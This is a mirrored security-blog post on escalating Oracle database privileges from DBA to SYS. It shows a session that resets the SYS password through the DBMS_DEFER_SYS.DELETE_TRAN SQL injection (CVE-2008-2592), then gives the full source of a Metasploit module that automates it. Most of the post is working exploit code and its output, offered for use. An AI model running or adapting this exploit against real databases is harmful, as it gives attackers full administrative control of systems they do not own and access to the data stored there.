首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Oracle Pwnage Part 6 from DBA to SYS
来源:CG |at| carnal0wnage |dot| com 作者:CG 发布时间:2008-12-24  

In some of the past posts I covered finding a user default user account or account with an easy to guess username/password for Oracle and taking that user to DBA via SQL Injection in Oracle packages.

I've been neglecting the blog a bit porting some of the public SQLI for Oracle into metasploit auxiliary modules. Not sure when its going to be put into the trunk but it will be at some point, I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.

Anyway, so it being the week of Christmas or whatever you celebrate I thought I'd put out a module that has a vulnerability out but no exploit code.

So...coverage for:
http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml

Details:
The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.

Impact:
Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.

Let's see it in action. Assuming we got DBA from one of the other SQLI modules.

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
HACKER DBA NO YES NO

SQL> alter user SYS identified by 0raclefun;
alter user SYS identified by 0raclefun
*
ERROR at line 1:
ORA-01031: insufficient privileges

msf auxiliary(dbms_defer_sys) > set SQL "alter user sys identified by 0raclefun"
SQL => alter user sys identified by 0raclefun
msf auxiliary(dbms_defer_sys) > run

[*] Sending function..
[*] Done...
[*] Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...
[*] Done...
[*] Auxiliary module execution completed

cg@WPAD:~/oracle$ sqlplus sys/0raclefun@172.16.102.128/oracle as sysdba

SQL*Plus: Release 11.1.0.6.0 - Production on Fri Dec 19 17:43:57 2008

Copyright (c) 1982, 2007, Oracle. All rights reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL>

select user from dual;

USER
------------------------------
SYS

SQL>

Tested on 9i and 10g release 1

codez available here: http://www.carnal0wnage.com/research/dbms_defer_sys.rb

It's definitely a work in progress, so if you have feedback, send it.

----------------------------------------code-------------------------------------------

##
# $Id: dbms_defer_sys.rb
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'


class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::ORACLE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SQL Injection via SYS.DBMS_DEFER_SYS',
			'Description'    => %q{
					This module will exploits a SQL Injection vulnerability in the SYS.DBMS_DEFER_SYS 							package. Any Oracle database user with EXECUTE privilege on the package 	SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege or anyone who is granted EXECUTE on SYS.DBMS_DEFER_SYS. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privilege  Affected versions: Oracle Database	Server versions 9iR1, 9iR2, 10gR1, 10gR2 and 11gR1.  Fixed with Oracle Critical Patch update July 2008. See additional comments in source.
					},
			'Author'         =>  'CG |at| carnal0wnage |dot| com' ,
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision:
, 'References' => [ [ 'CVE', '2008-2592'], [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml'], [ 'URL', 'http://seclists.org/fulldisclosure/2008/Aug/0229.html'], ], 'DisclosureDate' => 'JULY 29 2008')) register_options( [ OptString.new('DBA', [ false, 'DB user to elevate to DBA.', 'SCOTT']), OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), ], self.class) end #from: http://seclists.org/fulldisclosure/2008/Aug/0229.html #The DBA role in Oracle Database is not the same as SYSDBA privilege, #which is granted to SYS. There are many things that a user granted the #DBA role can't do - the most important being the ability to alter SYS #owned objects. This is true on databases where #O7_DICTIONARY_ACCESSIBILITY=FALSE (default value). #read the rest of the FD post for more usage ideas def run c = connect p = Rex::Text.rand_text_alpha(rand(8) + 1) query = datastore['SQL'].upcase # fun queries # set SQL "alter user SYS identified by my!supersecretpassword " # connect as: sys/my!supersecretpasswordr@IP/SID as sysdba # set SQL "GRANT DBA to user" function = " CREATE OR REPLACE FUNCTION #{p} RETURN NUMBER AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE '#{query}'; COMMIT; RETURN(0); END; " #so far I havent figured out how to see the output of the query with this module # The user executing this module will have to be DBA or have execute privileges on the SYS.DBMS_DEFER_SYS package (which is just DBA by default) call = " BEGIN SYS.DBMS_DEFER_SYS.DELETE_TRAN ('''||'||user||'.#{p}||''',''); END; " print_status("Sending function..") prepare_exec(function) print_status("Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...") prepare_exec(call) c.disconnect end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BulletProof FTP Client 2.63 Lo
·Joomla Component 5starhotels (
·Exploits FreeSSHd Multiple Rem
·PHP-Fusion <= 7.0.2 Remote Bli
·FreeSSHD 1.2.1 (Post Auth) Rem
·Acoustica Mixcraft <= 4.2 Univ
·Google Chrome Browser (ChromeH
·SAWStudio 3.9i (prf File) Loca
·Getleft 1.2 Remote Buffer Over
·FreeBSD 7/6x protosw kernel ex
·CMS NetCat 3.12 (password_reco
·PSI remote integer overflow Do
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved